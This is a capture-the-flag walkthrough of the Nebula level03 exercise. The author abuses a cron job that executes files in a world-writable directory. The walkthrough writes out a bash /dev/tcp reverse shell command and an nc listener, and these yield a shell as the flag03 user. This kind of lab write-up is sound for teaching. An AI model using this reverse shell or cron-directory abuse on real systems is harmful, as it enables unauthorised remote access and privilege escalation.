We start off with understanding what is being asked of us:
As we read the About section, we see that we need to check the home directory for 'flag03' and take note of the files. Additionally, there is a crontab that is called every couple of minutes.
With our task in hand, we SSH into the node and move to the /home/flag03 directory:
level03@nebula:~$ cd /home/flag03/ level03@nebula:/home/flag03$ ls -lah total 5.5K drwxr-x--- 3 flag03 level03 103 2011-11-20 20:39 . drwxr-xr-x 1 root root 120 2012-08-27 07:18 .. -rw-r--r-- 1 flag03 flag03 220 2011-05-18 02:54 .bash_logout -rw-r--r-- 1 flag03 flag03 3.3K 2011-05-18 02:54 .bashrc -rw-r--r-- 1 flag03 flag03 675 2011-05-18 02:54 .profile drwxrwxrwx 2 flag03 flag03 3 2012-08-18 05:24 writable.d -rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh level03@nebula:/home/flag03$
2 things stand out. We have a world writable directory "writable.d" and a script (writable.sh) that is owned by flag03.
We cat the script to see what it should do:
level03@nebula:/home/flag03$ cat writable.sh #!/bin/sh for i in /home/flag03/writable.d/* ; do (ulimit -t 5; bash -x "$i") rm -f "$i" done level03@nebula:/home/flag03$
This is a very basic script. It has a for loop that checks the /home/flag03/writable.d directory and all its contents. If there's any contents, it will perform "ulimit" which will "get of set user limits". The -t flag is for cpu-time which is set to a maximum cpu time of 5 seconds. After this, it will invoke bash and execute the file located in writable.d and then it will remove the file.
My assumption here is that the crontab is calling the writable.sh script every couple minutes. Depending on the owner of the crontab, it will execute as that user. However, we are unable to know this information.
So, what I do is create a reverse shell file and place it into the writable.d directory:
level03@nebula:/home/flag03$ echo "bash -i >& /dev/tcp/192.168.56.1/4444 0>&1" > /home/level03/shell level03@nebula:/home/flag03$ cp /home/level03/shell writable.d/ level03@nebula:/home/flag03$ ls -lah writable.d/ total 4.0K drwxrwxrwx 1 flag03 flag03 60 2017-02-25 14:07 . drwxr-x--- 1 flag03 level03 60 2011-11-20 20:39 .. -rw-rw-r-- 1 level03 level03 43 2017-02-25 14:07 shell level03@nebula:/home/flag03$
At this time, I also set up my listener on the same port:
eric@geoda:~$ nc -nlvp 4444 listening on [any] 4444 ...
I then wait:
eric@geoda:~$ nc -nlvp 4444 listening on [any] 4444 ... connect to [192.168.56.1] from (UNKNOWN) [192.168.56.106] 55958 bash: no job control in this shell flag03@nebula:~$ whoami whoami flag03 flag03@nebula:~$ getflag getflag You have successfully executed getflag on a target account flag03@nebula:~$
As hoped, my shell hits and I am running as flag03! I getflag to confirm.
This exercise shows how crontabs can be exploited. It also shows that if there are world writable directories that are owned by higher privilege users, it too can be exploited.
Thanks for reading!
-geoda